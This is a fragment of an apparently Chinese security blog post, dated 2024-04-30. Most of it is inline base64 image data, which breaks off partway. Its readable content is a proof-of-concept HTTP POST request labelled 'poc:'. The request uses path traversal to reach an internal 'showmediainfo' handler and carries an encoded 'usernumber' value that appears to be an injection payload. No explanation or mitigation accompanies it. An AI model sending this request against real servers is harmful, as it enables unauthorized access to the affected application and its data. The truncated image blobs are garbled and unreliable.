<p blockindex=36><img src=data:image/png;base64,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
poc:</p>
<pre blockindex=37><code class="hljs language-js">POST /templates/attestation/../../workbench/duty/showmediainfo HTTP/<span class=hljs-number>1.1</span>
<span class=hljs-attr>Host</span>: <span class=hljs-number>127.0</span><span class=hljs-number>.0</span><span class=hljs-number>.1</span>:<span class=hljs-number>8080</span>
User-Agent:Mozilla/<span class=hljs-number>5.0</span> (X11; OpenBSD i386) AppleWebKit/<span class=hljs-number>537.36</span> (KHTML, like Gecko) Chrome/<span class=hljs-number>36.0</span><span class=hljs-number>.1985</span><span class=hljs-number>.125</span> Safari/<span class=hljs-number>537.36</span>
Content-Type: application/x-www-form-urlencoded
Content-Length: <span class=hljs-number>84</span>

kind=<span class=hljs-number>0</span>&amp;usernumber=i8hoHAILh4YkvJtIAayRbk4pSpIEAvWmx22WPMFig6wPAATTP3HJDPAATTP&amp;i9999=
</code></pre>
<p blockindex=38><img src="data:image/png;base64,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
 </div>
 <div class="post-opt mt-30">
 <ul class="list-inline text-muted">
 <li>
 <i class="fa fa-clock-o"></i>
 发表于 2024-04-30 09:00:02
 </li>
 
 
 
 </ul>
 </div>
 </div>
 
 </div>
 
 
 </div>
 
 
 </div>
 </div>
</div>